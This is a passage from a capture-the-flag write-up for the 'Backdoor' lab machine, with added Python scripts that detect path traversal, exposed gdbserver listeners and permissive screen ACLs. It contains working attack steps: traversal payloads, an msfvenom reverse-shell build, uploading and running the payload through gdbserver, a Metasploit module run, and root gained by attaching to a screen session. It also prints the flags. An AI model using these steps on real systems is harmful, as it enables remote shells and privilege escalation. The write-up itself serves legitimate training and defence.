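        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.30 - - [20/Nov/2021:21:30:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../proc/1/cmdline HTTP/1.1" 200 273 "-" "Fuzz Faster U Fool v1.3.1"
10.10.14.30 - - [20/Nov/2021:21:30:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2Fproc%2Fnet%2Ftcp HTTP/1.1" 200 1800 "-" "curl/7.74.0"
192.0.2.7 - - [20/Nov/2021:21:31:44 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 52000 "-" "Mozilla/5.0"
192.0.2.7 - - [20/Nov/2021:21:31:50 +0000] "GET /index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = find_traversal_hits(SAMPLE_LOG.splitlines())
    for ip, status, target in found:
        print(f"{ip} status={status} file={target}")
    print(summarize(found))
```

A legitimate download (the third line, an absolute URL to the uploads directory) is not flagged, while both traversal attempts from 10.10.14.30 are. In production you would feed the real access log and alert on any hit, since there is no legitimate reason for that parameter to contain "../".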

After downloading each of the files we see several commands being run, among them a gdbserver started as the user `user` and a screen session started by root. gdbserver is listening on port 1337, the port we had found in net/tcp.

 π ~/htb/backdoor/proc_files ❯ more * |cat
::::::::::::::
816
::::::::::::::
/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
::::::::::::::
822
::::::::::::::

/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
::::::::::::::
833
::::::::::::::
sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
::::::::::::::
913
::::::::::::::
/sbin/agetty-o-p -- \u--nocleartty1linux
::::::::::::::
9951
::::::::::::::
suuser-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
::::::::::::::
9959
::::::::::::::
bash-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
π ~/htb/backdoor/proc_files ❯
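The cmdline files come out run together ("/bin/sh-cwhile true;...") because /proc/<pid>/cmdline separates arguments with NUL bytes, which are dropped on the way through the plugin and the browser. As an added example that is not part of the writeup, the code below does the two things the author did by hand, in a form a defender can run on the host: it splits cmdline blobs back into argv, parses /proc/net/tcp for sockets in LISTEN state, and flags listeners bound to every interface (0.0.0.0) whose command line runs gdbserver. Linking a socket to a process by matching the port text in the command line is an assumption made for this example; a real audit would use `ss -ltnp` or /proc/<pid>/fd. The /proc/net/tcp lines and the cmdline blobs are constructed sample data modelled on the box's processes, and pid 9963 is made up.

```python
import socket
import struct

# /proc/net/tcp state code for LISTEN (TCP_LISTEN in the kernel's enum).
TCP_LISTEN = 0x0A


def parse_cmdline(raw: bytes):
    """Split a /proc/<pid>/cmdline blob (NUL-separated argv) into a list of arguments."""
    return [arg.decode("utf-8", "replace") for arg in raw.split(b"\x00") if arg]


def _hex_addr(addr_port: str):
    """Convert '0100007F:0539' from /proc/net/tcp into ('127.0.0.1', 1337)."""
    addr_hex, port_hex = addr_port.split(":")
    # The address is a 32-bit value in host byte order printed as hex (little-endian on x86).
    ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(net_tcp: str):
    """Return [(local_ip, local_port, uid)] for every socket in LISTEN state."""
    listeners = []
    for line in net_tcp.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        local, state, uid = fields[1], int(fields[3], 16), int(fields[7])
        if state == TCP_LISTEN:
            ip, port = _hex_addr(local)
            listeners.append((ip, port, uid))
    return listeners


def exposed_debug_listeners(net_tcp: str, cmdlines: dict):
    """Flag 0.0.0.0 listeners whose owning command line runs gdbserver on that port.

    cmdlines maps pid -> raw cmdline bytes. The socket/process link is made by
    port text here (assumption for the example, see the lead-in).
    """
    findings = []
    for ip, port, uid in parse_listeners(net_tcp):
        if ip != "0.0.0.0":
            continue
        for pid, raw in cmdlines.items():
            argv = parse_cmdline(raw)
            joined = " ".join(argv)
            if "gdbserver" in joined and f":{port}" in joined:
                findings.append({"pid": pid, "port": port, "uid": uid, "argv": argv})
    return findings


# Constructed /proc/net/tcp sample: gdbserver on 0.0.0.0:1337 (uid 1000), mysqld on
# 127.0.0.1:3306, apache on 0.0.0.0:80, plus one established connection.
SAMPLE_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 21345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 20011 1 0000000000000000 100 0 0 10 0
   2: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 19876 1 0000000000000000 100 0 0 10 0
   3: 7D0B0A0A:0050 1E0E0A0A:9070 01 00000000:00000000 00:00000000 00000000    33        0 30012 1 0000000000000000 20 4 30 10 -1
"""

# Constructed cmdline blobs modelled on the dump above (pid 9963 is made up).
SAMPLE_CMDLINES = {
    822: b'/bin/sh\x00-c\x00while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done\x00',
    9963: b"gdbserver\x00--once\x000.0.0.0:1337\x00/bin/true\x00",
    982: b"/usr/sbin/mysqld\x00",
}

if __name__ == "__main__":
    for ip, port, uid in parse_listeners(SAMPLE_NET_TCP):
        print(f"LISTEN {ip}:{port} uid={uid}")
    for f in exposed_debug_listeners(SAMPLE_NET_TCP, SAMPLE_CMDLINES):
        print(f"EXPOSED pid={f['pid']} port={f['port']} uid={f['uid']} argv={f['argv']}")
```

Run on a real host, the same functions work on `open('/proc/net/tcp').read()` and `open(f'/proc/{pid}/cmdline','rb').read()`; a gdbserver reachable from every interface, restarted in a loop by a root cron job, is exactly the kind of finding this should surface.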

GDBServer

ELF File

We find that it is possible to run an ELF file through the gdb server to get a reverse shell, after placing the file on the server and setting it as the executable. We create the file with msfvenom.

 π ~/htb/backdoor ❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.30 LPORT=1338 PrependFork=true -f elf -o binary.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: binary.elf
 π ~/htb/backdoor ❯ chmod +x binary.elf
 π ~/htb/backdoor ❯

We start gdb with the file we just created.

 π ~/htb/backdoor ❯ gdb binary.elf
GNU gdb (Debian 10.1-2) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
(gdb) 

We connect to the gdb server, upload the .elf, set it as the remote executable and finally run it.

(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put binary.elf binary.elf
Successfully sent file "binary.elf".
(gdb) set remote exec-file /home/user/binary.elf
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /home/user/binary.elf from remote target...
Reading /home/user/binary.elf from remote target...
Reading symbols from target:/home/user/binary.elf...
(No debugging symbols found in target:/home/user/binary.elf)
[Detaching after fork from child process 1529]
[Inferior 1 (process 1520) exited normally]
(gdb)

In our netcat listener we see that we got a shell as the user `user`.

 π ~/htb/backdoor ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.30] from 10.10.11.125 [10.10.11.125] 36976
id
uid=1000(user) gid=1000(user) groups=1000(user)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
user@Backdoor:/home/user$ pwd
/home/user
user@Backdoor:/home/user$

Metasploit

There is also a Metasploit module that achieves command execution against gdbserver. After configuring the module in Metasploit we obtained a shell as `user` and the user.txt flag.

msf6 exploit(multi/gdb/gdb_server_exec) > show options

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    10.10.11.125     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     1337             yes       The target port (TCP)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.30      yes       The listen address (an interface may be specified)
   LPORT  12345            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64 (64-bit)


msf6 exploit(multi/gdb/gdb_server_exec) >
msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 10.10.14.30:12345
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Command shell session 1 opened (10.10.14.30:12345 -> 10.10.11.125:38856 ) at 2021-11-21 01:05:32 +0000

whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)
ls -lah
total 36K
drwxr-xr-x 6 user user 4.0K Nov 10 14:18 .
drwxr-xr-x 3 root root 4.0K Nov 10 14:18 ..
lrwxrwxrwx 1 root root    9 Jul 18 21:43 .bash_history -> /dev/null
-rw-r--r-- 1 user user 3.7K Feb 25  2020 .bashrc
drwx------ 2 user user 4.0K Nov 10 14:18 .cache
drwx------ 3 user user 4.0K Nov 10 14:18 .config
drwx------ 4 user user 4.0K Nov 10 14:18 .gnupg
drwxrwxr-x 3 user user 4.0K Nov 10 14:18 .local
-rw-r--r-- 1 user user  807 Feb 25  2020 .profile
-rw-r----- 1 root user   33 Nov 20 23:05 user.txt
cat user.txt
98c7ff1956a8e023beac2c2dc9a6d2c5

Privesc

Enumerating the processes running as root we see a detached screen session, just as the proc files showed.

user@Backdoor:~$ ps -ef|grep root
ps -ef|grep root
[.. snip ..]
root         795       1  0 03:45 ?        00:00:00 /usr/sbin/cron -f
root         797     795  0 03:45 ?        00:00:00 /usr/sbin/CRON -f
root         798     795  0 03:45 ?        00:00:00 /usr/sbin/CRON -f
root         816     798  0 03:45 ?        00:00:01 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root         822     797  0 03:45 ?        00:00:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
root         833       1  0 03:45 ?        00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         906       1  0 03:45 ?        00:00:00 SCREEN -dmS root
root         908     906  0 03:45 pts/0    00:00:00 -/bin/bash
root         913       1  0 03:45 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
[.. snip ..]
user@Backdoor:~$

We attach to the session as a guest, which gives us a shell as root and our root.txt flag.

$ script /dev/null
$ export TERM='vt100'
$ screen -x root/root
root@Backdoor:~# whoami; id
whoami; id
root
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# cd /root
cd /root
root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
1d42d242599341801ed69f61f309d37f
root@Backdoor:~#
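Attaching to another account's session with `screen -x root/root`, as above, only works when the owner's session is in multiuser mode and the attaching account has been granted access with acladd/aclchg (and the screen binary is setuid root); a plain detached session cannot be joined by other users. The writeup does not show root's .screenrc, so the sample below is constructed. As an added example, not code from the writeup, here is a small audit that reads a screenrc and reports which accounts it lets attach, which is the check that would have caught this configuration on the host.

```python
# GNU screen directives that control who may attach to a session
# ("Multiuser Session" in the screen manual): multiuser on|off, acladd/addacl,
# aclchg/chacl, acldel.


def parse_screenrc(text: str):
    """Return (directive, args) tuples, ignoring comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        parts = line.split()
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_screenrc(text: str):
    """Report who can attach to sessions started with this screenrc.

    Returns {'multiuser': bool, 'granted': set of user names, 'findings': [str]}.
    """
    multiuser = False
    granted = set()
    findings = []
    for directive, args in parse_screenrc(text):
        if directive == "multiuser" and args:
            multiuser = args[0].lower() == "on"
        elif directive in {"acladd", "addacl", "aclchg", "chacl"} and args:
            # First argument is one or more comma-separated user names.
            for name in args[0].split(","):
                if name:
                    granted.add(name)
        elif directive == "acldel" and args:
            granted.discard(args[0])
    if multiuser and granted:
        findings.append("multiuser session attachable by: " + ", ".join(sorted(granted)))
    elif multiuser:
        findings.append("multiuser on but no ACL entries: only the owner can attach")
    return {"multiuser": multiuser, "granted": granted, "findings": findings}


# Constructed sample; not the box's real /root/.screenrc.
SAMPLE_SCREENRC = """\
startup_message off
multiuser on        # allow other accounts to attach
acladd user         # grant the low-privileged account full access
"""

if __name__ == "__main__":
    result = audit_screenrc(SAMPLE_SCREENRC)
    for finding in result["findings"]:
        print("FINDING:", finding)
```

On a real host you would run this over every ~/.screenrc and /etc/screenrc and treat any root-owned session that grants access to a non-root account as a privilege-escalation path.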
Written by sckull (Dany Sucuc), RedTeamer & Pentester wannabe